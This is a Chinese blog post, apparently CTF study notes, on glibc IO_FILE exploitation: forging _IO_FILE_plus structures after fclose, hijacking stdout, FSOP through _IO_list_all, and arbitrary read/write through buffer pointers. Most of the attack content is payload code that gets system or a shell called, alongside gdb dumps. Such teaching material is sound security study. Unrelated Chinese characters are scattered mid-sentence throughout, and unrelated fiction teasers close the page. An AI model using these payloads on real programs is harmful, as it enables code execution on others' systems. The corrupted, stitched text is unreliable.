IO_FILE利用的一些總結(jié)

  • fclose 劫持fp指針,偽造_IO_FILE_plus結(jié)構(gòu)

    偽造IO_FILE_plus結(jié)構(gòu)體, 32位和64位不一樣羡榴,32位的需要偽造vtable,而64位可以不用偽造vtable桶至,因?yàn)?4位的在繞過幾個(gè)函數(shù)后會(huì)獲得一次call [rax + 0x10]的機(jī)會(huì)

image.png

先說32bits的

  • 調(diào)用 IO_FINISH(fp)的情況

    #注意flags字段遣蚀,只需要_flags & 0x2000為0就會(huì)直接調(diào)用 IO_FINSH(fp)科平,IO_FINISH(fp)相當(dāng)于調(diào)用fp->vtabl->__finish(fp)
    #其中shell是后門函數(shù)
    fake_file = "\x00" * 0x48 + p32(buf_add)
    fake_file = fake_file.ljust(0x94, "\x00")
    fake_file += p32(buf_add + 0x98 - 0x8)#fake_vtable_addr = buf_addr + 0x98 - 0x8
    fake_file += p32(shell)
    #不存在后門函數(shù)的情況
    fake_file = "\x00" * 4 + ";sh" 
    fake_file = fake_file.ljust(0x48,'\x00')+ p32(buf_add)
    fake_file = fake_file.ljust(0x94, "\x00")
    fake_file += p32(buf_add + 0x98 - 0x8)#fake_vtable_addr = buf_addr + 0x98 - 0x8
    fake_file += p32(system)
    
  • 調(diào)用__fclose()函數(shù)的情況: flags & 0x2000不為0

    #_flags & 0x2000不為0最終會(huì)調(diào)用fp->vtabl->__fclose(fp)
    fake_file = "/bin/sh\x00"
    fake_file = fake_file.ljust(0x48,'\x00')
    fake_file += p32(fake_lock_addr) # 指向一處值為0的地址
    fake_file = fake_file.ljust(0x94, "\x00")
    fake_file += p32(fake_vtable)#fake vtable address = buf_addr + 0x98 - 0x44
    fake_file += p32(system)
    

64bits的情況:

  • 程序中存在后門函數(shù)

    fake_file ='\0'*0x10 + p64(get_shell)+'\0'*0x70+ p64(buf_addr)
    fake_file = fake_file.ljust(0xd8,'\0')+p64(buf_addr)
    
  • 程序中不存在后門函數(shù)

    fake_file = "/bin/sh\x00" + '\x00' * 0x8
    fake_file += p64(system) + '\x00' * 0x70
    # the system can also be placed in other memory
    fake_file += p64(fake_lock_addr)#指向一處值為0的地址
    fake_file = fake_file.ljust(0xd8, '\x00')
    fake_file += p64(buf_addr + 0x10 - 0x88) # fake_vtable_addr
    

    fclose源碼學(xué)習(xí)文章:blog

    等過段時(shí)間有時(shí)間了在去分析下fclose源碼

    例子 : xman 的example1 可以編譯成32位和64位來練練手 体箕,pwnable.tw的seethefile

  • 劫持 stdout文件流指針

    通過任意地址寫漏洞柏副,將stdout的指針指向偽造的_IO_FILE_plus結(jié)構(gòu),其中vtable指向偽造的 vtable函數(shù)表

    這里拿 網(wǎng)鼎杯的那道blind做例子

    原本的stdout結(jié)構(gòu)體

    gef?  p  *(struct _IO_FILE_plus *) stdout
    $2 = {
      file = {
        _flags = 0xfbad2887, 
        _IO_read_ptr = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_read_end = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_read_base = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_write_base = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_write_ptr = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_write_end = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_buf_base = 0x7f5b6742a6a3 <_IO_2_1_stdout_+131> "\n", 
        _IO_buf_end = 0x7f5b6742a6a4 <_IO_2_1_stdout_+132> "", 
        _IO_save_base = 0x0, 
        _IO_backup_base = 0x0, 
        _IO_save_end = 0x0, 
        _markers = 0x0, 
        _chain = 0x7f5b674298e0 <_IO_2_1_stdin_>, 
        _fileno = 0x1, 
        _flags2 = 0x0, 
        _old_offset = 0xffffffffffffffff, 
        _cur_column = 0x0, 
        _vtable_offset = 0x0, 
        _shortbuf = "\n", 
        _lock = 0x7f5b6742b780 <_IO_stdfile_1_lock>, 
        _offset = 0xffffffffffffffff, 
        _codecvt = 0x0, 
        _wide_data = 0x7f5b674297a0 <_IO_wide_data_1>, 
        _freeres_list = 0x0, 
        _freeres_buf = 0x0, 
        __pad5 = 0x0, 
        _mode = 0xffffffff, 
        _unused2 = '\000' <repeats 19 times>
      }, 
      vtable = 0x7f5b674286e0 <_IO_file_jumps>
    }
    

    偽造的IO_FILE_plus結(jié)構(gòu)體中的flags要滿足下面的條件

    flag&8 = 0 and flag &2 =0 and flag & 0x8000 != 0
    所以flag的值可以為0xfbad8000 或者0xfbad8080
    

    其他的根據(jù)原本的結(jié)構(gòu)體偽造就行了

    fake_struct = p64(0x00000000fbad8000) + p64(0x602060)*7 + p64(0x602061) + p64(0)*4  
    fake_struct += p64(0x602060) + p64(0x1)  + p64(0xffffffffffffffff)+ p64(0) 
    fake_struct += p64(0x602060) + p64(0xffffffffffffffff) + p64(0) + p64(0x602060) 
    fake_struct += p64(0)*3 + p64(0x00000000ffffffff) + p64(0) 
    fake_struct += p64(0)+ p64(0x602090 + 0x68*3)
    fake_vtable = p64(system_addr)*10 + '\n'
    

    偽造后的結(jié)構(gòu)體:

    gef?  p *(struct _IO_FILE_plus *)0x602090
    $1 = {
      file = {
        _flags = 0xfbad8000, 
        _IO_read_ptr = 0x602060 "  `", 
        _IO_read_end = 0x602060 "  `", 
        _IO_read_base = 0x602060 "  `", 
        _IO_write_base = 0x602060 "  `", 
        _IO_write_ptr = 0x602060 "  `", 
        _IO_write_end = 0x602060 "  `", 
        _IO_buf_base = 0x602060 "  `", 
        _IO_buf_end = 0x602061 " `", 
        _IO_save_base = 0x0, 
        _IO_backup_base = 0x0, 
        _IO_save_end = 0x0, 
        _markers = 0x0, 
        _chain = 0x602060, 
        _fileno = 0x1, 
        _flags2 = 0x0, 
        _old_offset = 0xffffffffffffffff, 
        _cur_column = 0x0, 
        _vtable_offset = 0x0, 
        _shortbuf = "", 
        _lock = 0x602060, 
        _offset = 0xffffffffffffffff, 
        _codecvt = 0x0, 
        _wide_data = 0x602060, 
        _freeres_list = 0x0, 
        _freeres_buf = 0x0, 
        __pad5 = 0x0, 
        _mode = 0xffffffff, 
        _unused2 = '\000' <repeats 19 times>
      }, 
      vtable = 0x6021c8
    }
    
  • FSOP

    這個(gè)技術(shù)的核心就是劫持_IO_list_all的值來偽造鏈表和其中的_IO_FILE項(xiàng)宛琅,但是單純的偽造只是構(gòu)造了數(shù)據(jù)還需要某種方法進(jìn)行觸發(fā)。FSOP選擇的觸發(fā)方法是調(diào)用_IO_flush_all_lockp臀晃,這個(gè)函數(shù)會(huì)刷新_IO_list_all鏈表中所有項(xiàng)的文件流觉渴,相當(dāng)于對(duì)每個(gè)FILE調(diào)用fflush,也對(duì)應(yīng)著會(huì)調(diào)用_IO_FILE_plus.vtable中的IO_overflow函數(shù)徽惋。

    libc版本小于2.24

    IO_flush_all_lockp函數(shù)源碼

    _IO_flush_all_lockp (int do_lock)
    {
      int result = 0;
      FILE *fp;
    #ifdef _IO_MTSAFE_IO
      _IO_cleanup_region_start_noarg (flush_cleanup);
      _IO_lock_lock (list_all_lock);
    #endif
      for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
        {
          run_fp = fp;
          if (do_lock)
            _IO_flockfile (fp);
          if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)/*一些檢查案淋,需要繞過*/
               || (_IO_vtable_offset (fp) == 0
                   && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                                        > fp->_wide_data->_IO_write_base))/*也可以繞過這個(gè)*/
               )
              && _IO_OVERFLOW (fp, EOF) == EOF)/*遍歷_IO_list_all ,選出_IO_FILE作為_IO_OVERFLOW的參數(shù)险绘,執(zhí)行函數(shù)*/
            result = EOF;
          if (do_lock)
            _IO_funlockfile (fp);
          run_fp = NULL;
        }
    #ifdef _IO_MTSAFE_IO
      _IO_lock_unlock (list_all_lock);
      _IO_cleanup_region_end (0);
    #endif
      return result;
    }
    

    IO_flush_all_lockp函數(shù)觸發(fā)條件:

    1. 當(dāng)libc執(zhí)行abort流程時(shí) abort可以通過觸發(fā)malloc_printerr來觸發(fā)
    2. 當(dāng)執(zhí)行exit函數(shù)時(shí)
    3. 當(dāng)執(zhí)行流從main函數(shù)返回時(shí)

FSOP攻擊的前提條件:

  • 泄露出libc地址踢京,知道 _IO_lsit_all的地址
  • 任意地址寫的能力,修改 _IO_list_all為可控的地址
  • 可以在可控內(nèi)存中偽造_IO_FILE_plus結(jié)構(gòu)

_IO_list_all 結(jié)構(gòu):

pwndbg> p *_IO_list_all
$1 = {
  file = {
    _flags = 0xfbad2086, 
    _IO_read_ptr = 0x0, 
    _IO_read_end = 0x0, 
    _IO_read_base = 0x0, 
    _IO_write_base = 0x0, 
    _IO_write_ptr = 0x0, 
    _IO_write_end = 0x0, 
    _IO_buf_base = 0x0, 
    _IO_buf_end = 0x0, 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x7ffff7dd2620 <_IO_2_1_stdout_>, #這里是我們需要控制的地方宦棺,將偽造的_IO_FILE_plus結(jié)構(gòu)鏈入 _IO_FILE的鏈表頭部
    _fileno = 0x2, 
    _flags2 = 0x0, 
    _old_offset = 0xffffffffffffffff, 
    _cur_column = 0x0, 
    _vtable_offset = 0x0, 
    _shortbuf = "", 
    _lock = 0x7ffff7dd3770 <_IO_stdfile_2_lock>, 
    _offset = 0xffffffffffffffff, 
    _codecvt = 0x0, 
    _wide_data = 0x7ffff7dd1660 <_IO_wide_data_2>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0x0, 
    _mode = 0x0, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}

偽造的_IO_FILE_plus結(jié)構(gòu)體要繞過的check

1.((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
   
或者是
2.
_IO_vtable_offset (fp) == 0 
&& fp->_mode > 0 
&& (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)

一般來說都是偽造前者瓣距,因?yàn)楹?jiǎn)單點(diǎn)

具體利用 可以去看 house of orange這道題

  • 新版本libc下的IO_FILE的利用

    通過控制 stdin/stdout文件流 內(nèi)部的_IO_buf_base和 _IO_buf_end來達(dá)到任意地址讀寫的目的

    因?yàn)檫M(jìn)程中包含了系統(tǒng)默認(rèn)的三個(gè)文件流stdin\stdout\stderr,因此這種方式可以不需要進(jìn)程中存在文件操作代咸,通過scanf\printf一樣可以進(jìn)行利用

    _IO_FILE結(jié)構(gòu)

    struct _IO_FILE
    {
      int _flags;                /*flag標(biāo)志位蹈丸,用于一些檢查 */
      /* The following pointers correspond to the C++ streambuf protocol. */
      char *_IO_read_ptr;        /* Current read pointer */
      char *_IO_read_end;        /* End of get area. */
      char *_IO_read_base;        /* Start of putback+get area. */
      char *_IO_write_base;        /* Start of put area. */
      char *_IO_write_ptr;        /* Current put pointer. */
      char *_IO_write_end;        /* End of put area. */
      char *_IO_buf_base;        /* 操作的起始地址. */
      char *_IO_buf_end;        /* 操作的結(jié)束地址. */
       /*控制 _IO_buf_base 和 _IO_buf_end就可以實(shí)現(xiàn)任意讀寫*/
      /* The following fields are used to support backing up and undo. */
      char *_IO_save_base; /* Pointer to start of non-current get area. */
      char *_IO_backup_base;  /* Pointer to first valid character of backup area */
      char *_IO_save_end; /* Pointer to end of non-current get area. */
      struct _IO_marker *_markers;
      struct _IO_FILE *_chain; /* 用于形成_IO_FILE 鏈表
      int _fileno;
      int _flags2;
      __off_t _old_offset; /* This used to be _offset but it's too small.  */
      /* 1+column number of pbase(); 0 is unknown. */
      unsigned short _cur_column;
      signed char _vtable_offset;
      char _shortbuf[1];
      _IO_lock_t *_lock;
    #ifdef _IO_USE_OLD_IO_FILE
    };
    

任意地址讀的例子 from Angelboy大佬

image.png

任意地址寫的例子 from Angelboy大佬

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市呐芥,隨后出現(xiàn)的幾起案子逻杖,更是在濱河造成了極大的恐慌,老刑警劉巖思瘟,帶你破解...
    沈念sama閱讀 219,490評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件荸百,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡滨攻,警方通過查閱死者的電腦和手機(jī)够话,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來光绕,“玉大人女嘲,你說我怎么就攤上這事〉剩” “怎么了澡为?”我有些...
    開封第一講書人閱讀 165,830評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)景埃。 經(jīng)常有香客問我媒至,道長(zhǎng),這世上最難降的妖魔是什么谷徙? 我笑而不...
    開封第一講書人閱讀 58,957評(píng)論 1 295
  • 正文 為了忘掉前任拒啰,我火速辦了婚禮,結(jié)果婚禮上完慧,老公的妹妹穿的比我還像新娘谋旦。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評(píng)論 6 393
  • 文/花漫 我一把揭開白布册着。 她就那樣靜靜地躺著拴孤,像睡著了一般。 火紅的嫁衣襯著肌膚如雪甲捏。 梳的紋絲不亂的頭發(fā)上演熟,一...
    開封第一講書人閱讀 51,754評(píng)論 1 307
  • 那天,我揣著相機(jī)與錄音司顿,去河邊找鬼芒粹。 笑死,一個(gè)胖子當(dāng)著我的面吹牛大溜,可吹牛的內(nèi)容都是我干的化漆。 我是一名探鬼主播,決...
    沈念sama閱讀 40,464評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼钦奋,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼座云!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起付材,我...
    開封第一講書人閱讀 39,357評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤朦拖,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后伞租,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,847評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡限佩,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評(píng)論 3 338
  • 正文 我和宋清朗相戀三年葵诈,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片祟同。...
    茶點(diǎn)故事閱讀 40,137評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡作喘,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出晕城,到底是詐尸還是另有隱情泞坦,我是刑警寧澤,帶...
    沈念sama閱讀 35,819評(píng)論 5 346
  • 正文 年R本政府宣布砖顷,位于F島的核電站贰锁,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏滤蝠。R本人自食惡果不足惜豌熄,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評(píng)論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望物咳。 院中可真熱鬧锣险,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至崖咨,卻和暖如春锻拘,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背掩幢。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評(píng)論 1 272
  • 我被黑心中介騙來泰國打工逊拍, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留结借,地道東北人中鼠。 一個(gè)月前我還...
    沈念sama閱讀 48,409評(píng)論 3 373
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像叫编,于是被迫代替她去往敵國和親世曾。 傳聞我的和親對(duì)象是個(gè)殘疾皇子缨恒,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評(píng)論 2 355